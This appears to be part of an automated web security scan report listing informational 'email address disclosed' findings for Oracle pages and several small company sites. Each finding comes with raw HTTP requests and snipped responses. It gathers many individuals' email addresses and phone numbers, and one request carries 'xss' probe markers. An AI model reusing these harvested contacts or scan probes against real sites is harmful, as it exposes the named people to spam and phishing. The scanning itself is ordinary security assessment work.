<a href="mailto:paul.j.phillips@oracle.com">paul.j.phillips@oracle.com</a>
...[SNIP]...
<a href="mailto:terina.doherty@oracle.com">terina.doherty@oracle.com</a>
...[SNIP]...
<a href="mailto:toshiaki.hine@oracle.com">toshiaki.hine@oracle.com</a>
...[SNIP]...
<a href="mailto:karen.bitran@oracle.com">karen.bitran@oracle.com</a>
...[SNIP]...
<a href="mailto:emilia.wasiak@oracle.com">emilia.wasiak@oracle.com</a>
...[SNIP]...
<a href="mailto:alison.odonnell@oracle.com">alison.odonnell@oracle.com</a>
...[SNIP]...

22.68. http://www.oracle.com/us/corporate/citizenship/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/citizenship/index.html

Issue detail

The following email address was disclosed in the response:

citizenship_ww@oracle.com

Request

GET /us/corporate/citizenship/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.69. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/customers/oracle-users-groups-192206.html

Issue detail

The following email address was disclosed in the response:

Oracleusergroup_ww@oracle.com

Request

Response

22.70. http://www.oracle.com/us/corporate/insight/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/insight/index.html

Issue detail

The following email address was disclosed in the response:

insight_ww@oracle.com

Request

GET /us/corporate/insight/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.71. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/BoardofDirectors/index.html

Issue detail

The following email address was disclosed in the response:

Oracle-Press_ww@oracle.com

Request

GET /us/corporate/press/BoardofDirectors/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.72. http://www.oracle.com/us/corporate/press/Executives/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/Executives/index.html

Issue detail

The following email address was disclosed in the response:

Oracle-Press_ww@oracle.com

Request

GET /us/corporate/press/Executives/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.73. http://www.oracle.com/us/corporate/press/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/index.html

Issue detail

The following email address was disclosed in the response:

Oracle-Press_ww@oracle.com

Request

GET /us/corporate/press/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.74. http://www.oracle.com/us/corporate/profit/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/profit/index.html

Issue detail

The following email address was disclosed in the response:

jennifer.hamilton@oracle.com

Request

GET /us/corporate/profit/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.75. http://www.oracle.com/us/corporate/publishing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/publishing/index.html

Issue detail

The following email addresses were disclosed in the response:

frank.cipolla@epostdirect.com
jennifer.hamilton@oracle.com
kevin.collopy@edithroman.com

Request

GET /us/corporate/publishing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166585496136002,0:1)
Date: Tue, 06 Sep 2011 16:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:jennifer.hamilton@oracle.com">jennifer.hamilton@oracle.com</a>
...[SNIP]...
<a href="mailto:kevin.collopy@edithroman.com"><span class="bodylink">kevin.collopy@edithroman.com</span>
...[SNIP]...
<a href="mailto:frank.cipolla@epostdirect.com">frank.cipolla@epostdirect.com</a>
...[SNIP]...

22.76. http://www.oracle.com/us/education/oukc/email-079121.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/education/oukc/email-079121.html

Issue detail

The following email address was disclosed in the response:

olntech_us@oracle.com

Request

GET /us/education/oukc/email-079121.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41070167774850150,0:1)
Date: Tue, 06 Sep 2011 16:08:27 GMT
Content-Length: 31255
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<form action="mailto:olntech_us@oracle.com?subject=On-line Technical Support" method="post" enctype="text/plain" onSubmit ="return checkForm(this)" name="techform">
...[SNIP]...

22.77. http://www.oracle.com/us/industries/financial-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/financial-services/index.html

Issue detail

The following email address was disclosed in the response:

financialservices_ww@oracle.com

Request

GET /us/industries/financial-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41122746764032528,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:financialservices_ww@oracle.com?subject=Oracle Financial Services RFP/RFI Submission&body=Company:%0AContact Name:%0AJob Title:%0APhone:%0ACountry:%0AOffering sought from Oracle:%0ADeadline for submission of response from Oracle
...[SNIP]...
<a href="mailto:financialservices_ww@oracle.com?subject=Oracle Financial Services RFP/RFI Submission&body=Company:%0AContact Name:%0AJob Title:%0APhone:%0ACountry:%0AOffering sought from Oracle:%0ADeadline for submission of response from Oracle
...[SNIP]...
<a href="mailto:financialservices_ww@oracle.com">
...[SNIP]...

22.78. http://www.oracle.com/us/industries/retail/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/retail/index.html

Issue detail

The following email address was disclosed in the response:

oneretailvoice_ww@oracle.com

Request

GET /us/industries/retail/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41103114469486884,0:1)
Date: Tue, 06 Sep 2011 16:16:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:oneretailvoice_ww@oracle.com?subject=Oracle Retail Voice Submission&body=Company:%0AContact Name:%0AJob Title:%0APhone:%0AEmail Address:%0A">
...[SNIP]...
<a href="mailto:oneretailvoice_ww@oracle.com?subject=Oracle Retail Voice Submission&body=Company:%0AContact Name:%0AJob Title:%0APhone:%0AEmail Address:%0A">
...[SNIP]...

22.79. http://www.oracle.com/us/partnerships/solutions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/partnerships/solutions/index.html

Issue detail

The following email address was disclosed in the response:

partnerintegration_us@oracle.com

Request

GET /us/partnerships/solutions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.80. http://www.oracle.com/us/products/applications/primavera/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/primavera/index.html

Issue detail

The following email address was disclosed in the response:

PRIMNEWS_us@oracle.com

Request

GET /us/products/applications/primavera/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.81. http://www.oracle.com/us/sun/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/sun/index.html

Issue detail

The following email address was disclosed in the response:

acquisition-inquiries_ww@oracle.com

Request

GET /us/sun/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.82. http://www.oracle.com/us/support/advanced-customer-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/advanced-customer-services/index.html

Issue detail

The following email address was disclosed in the response:

acsdirect_us@oracle.com

Request

GET /us/support/advanced-customer-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.83. http://www.oracle.com/us/support/contact-068555.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/contact-068555.html

Issue detail

The following email addresses were disclosed in the response:

servicecontracts_de@oracle.com
servicecontracts_ee@oracle.com
servicecontracts_it@oracle.com
servicecontracts_lt@oracle.com

Request

GET /us/support/contact-068555.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40983856110748860,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:servicecontracts_ee@oracle.com">servicecontracts_ee@oracle.com</a>
...[SNIP]...
<a href="mailto:servicecontracts_de@oracle.com">servicecontracts_de@oracle.com</a>
...[SNIP]...
<a href="mailto:servicecontracts_it@oracle.com">servicecontracts_it@oracle.com</a>
...[SNIP]...
<a href="mailto:servicecontracts_lt@oracle.com">servicecontracts_lt@oracle.com</a>
...[SNIP]...

22.84. http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracleimg.com
Path:	/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js HTTP/1.1
Host: www.oracleimg.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/go/index.html?Src=7013425&Act=226&pcode=WWMK10042957MPP055
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 31 Aug 2011 13:57:01 GMT
ETag: "ad6050-75f4-4abcd80990540"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=171;ecid=17089556641633103,0:1)
Content-Length: 30196
Date: Tue, 06 Sep 2011 15:54:06 GMT
Connection: close

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.85. http://www.rayalab.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/

Issue detail

The following email address was disclosed in the response:

rosawest@aol.com

Request

Response

22.86. http://www.rayalab.com/free_sample.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/free_sample.html

Issue detail

The following email addresses were disclosed in the response:

ROSAWEST@AOL.COM
rosawest@aol.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:43 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 12 Aug 2009 02:39:57 GMT
ETag: "1889b3-4dcf-470e8bc1fda56"
Accept-Ranges: bytes
Content-Length: 19919
Content-Type: text/html
X-Pad: avoid browser bug

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:e-mail: rosawest@aol.com" class="email">
...[SNIP]...
<a href="mailto:e-mail: rosawest@aol.com" class="email">
...[SNIP]...
<a href="mailto:rosawest@aol.com" class="email">E-mail:rosawest@aol.com</a>
...[SNIP]...
<td colspan="6" align="center" class="rayalab_green">USA: 1-(800)-525-7292    INTERNATIONAL:-(818)-763-7292    FAX: 1-(818)-760-1069    E-mail: rosawest@aol.com</td>
...[SNIP]...
<a href="mailto:rosawest@aol.com" class="rayalab_left">ROSAWEST@AOL.COM</a>
...[SNIP]...
<td colspan="6" align="center" class="rayalab_green">USA: 1-(800)-525-7292    INTERNATIONAL:-(818)-763-7292    FAX: 1-(818)-760-1069    E-mail: rosawest@aol.com</td>
...[SNIP]...

22.87. http://www.resourcepoint.net/ATG-Services.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/ATG-Services.htm

Issue detail

The following email addresses were disclosed in the response:

ATGservices@ResourcePoint.net
ATGservices@resourcepoint.net

Request

GET /ATG-Services.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 21 Jan 2011 14:55:02 GMT
Accept-Ranges: bytes
ETag: "93a6dc2e7bb9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:39 GMT
Content-Length: 18756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ATG Services offered by Resource Point</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="mailto:ATGservices@resourcepoint.net" class="orangebullet">ATGservices@ResourcePoint.net</a>
...[SNIP]...

22.88. http://www.resourcepoint.net/TibcoTech.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/TibcoTech.htm

Issue detail

The following email addresses were disclosed in the response:

TibcoServices@ResourcePoint.net
tibcoservices@resourcepoint.net

Request

GET /TibcoTech.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/?string=faq+help+oss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: name=faq help oss; __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330594898:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.9.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 21 Jan 2011 14:55:00 GMT
Accept-Ranges: bytes
ETag: "07a292d7bb9cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:43 GMT
Content-Length: 26980

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point - Tibco Technologies</title>
<meta name="robots" content="index, follow">
<meta http-equiv="
...[SNIP]...
<a href="mailto:tibcoservices@resourcepoint.net" class="orangebullet">TibcoServices@ResourcePoint.net</a>
...[SNIP]...

22.89. http://www.resourcepoint.net/contactus.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/contactus.htm

Issue detail

The following email addresses were disclosed in the response:

careers@ResourcePoint.net
careers@resourcepoint.net
hr@ResourcePoint.net
hr@resourcepoint.net
info@ResourcePoint.net
info@resourcepoint.net

Request

GET /contactus.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 11:14:06 GMT
Accept-Ranges: bytes
ETag: "0d34654d20cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:16 GMT
Content-Length: 56853

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point - Contact Us | Contact for business success</title>
<meta name="robots" content="index, follo
...[SNIP]...
<a href="mailto:info@resourcepoint.net" class="orangebullet">info@ResourcePoint.net</a>
...[SNIP]...
<a href="mailto:careers@resourcepoint.net" class="orangebullet">careers@ResourcePoint.net</a>
...[SNIP]...
<a href="mailto:hr@resourcepoint.net" class="orangebullet">hr@ResourcePoint.net</a>
...[SNIP]...

22.90. http://www.resourcepoint.net/form.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/form.htm

Issue detail

The following email address was disclosed in the response:

info@resourcepoint.net

Request

GET /form.htm?i=Searchkeywordnotfound&abt=xss HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; name=xss

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 30 Jun 2010 21:13:48 GMT
Accept-Ranges: bytes
ETag: "04e6c219918cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:16 GMT
Content-Length: 13435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="images/rp_style.css" type="text/css">
<link rel="stylesheet" href="images/tis_style.css"
...[SNIP]...
st you whether you are looking for a full-time position in any IT disciplines...";
var strcontactus="If you have a specific question that's not addressed here or if you have suggestions contact us at info@resourcepoint.net or call ...";

function getPrint(print_area)
{

var not=window.location.href.split("?")[1];

var not1=not.split("=")[1];
var result=window.location.href.split("?")[1].split("&")[1].split("=")
...[SNIP]...

22.91. http://www.revsolutionsinc.com/careers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revsolutionsinc.com
Path:	/careers.html

Issue detail

The following email address was disclosed in the response:

hr@revsolutionsinc.com

Request

GET /careers.html HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Referer: http://www.revsolutionsinc.com/solutions.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:35:59 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "1ec8-4d81e194-0"
Last-Modified: Thu, 17 Mar 2011 10:25:24 GMT
Content-Type: text/html
Content-Length: 7880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>REV Solutions Inc.</
...[SNIP]...
<a href="mailto:hr@revsolutionsinc.com" class="flat-red-text">hr@revsolutionsinc.com</a>
...[SNIP]...

22.92. http://www.revsolutionsinc.com/careers_req_7.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revsolutionsinc.com
Path:	/careers_req_7.html

Issue detail

The following email address was disclosed in the response:

hr@revsolutionsinc.com

Request

GET /careers_req_7.html HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:32:46 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "2325-4d81e18c-0"
Last-Modified: Thu, 17 Mar 2011 10:25:16 GMT
Content-Type: text/html
Content-Length: 8997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>REV Solutions Inc.</
...[SNIP]...
<a href="mailto:hr@revsolutionsinc.com" class="flat-red-text">hr@revsolutionsinc.com</a>
...[SNIP]...

22.93. http://www.revsolutionsinc.com/contact_us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revsolutionsinc.com
Path:	/contact_us.html

Issue detail

The following email address was disclosed in the response:

info@revsolutionsinc.com

Request

GET /contact_us.html HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Referer: http://www.revsolutionsinc.com/careers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:36:00 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "1c0f-4dc4bf58-0"
Last-Modified: Sat, 07 May 2011 03:41:12 GMT
Content-Type: text/html
Content-Length: 7183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>REV Solutions Inc.</
...[SNIP]...
<a href="mailto:info@revsolutionsinc.com" class="flat-red-text">info@revsolutionsinc.com</a>
...[SNIP]...

22.94. http://www.sophelle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET / HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A56%3A09

Response

HTTP/1.1 200 OK
Content-Length: 13673
Content-Type: text/html
Content-Location: http://www.sophelle.com/index.html
Last-Modified: Wed, 31 Aug 2011 16:06:08 GMT
Accept-Ranges: bytes
ETag: "1a1549e5f767cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
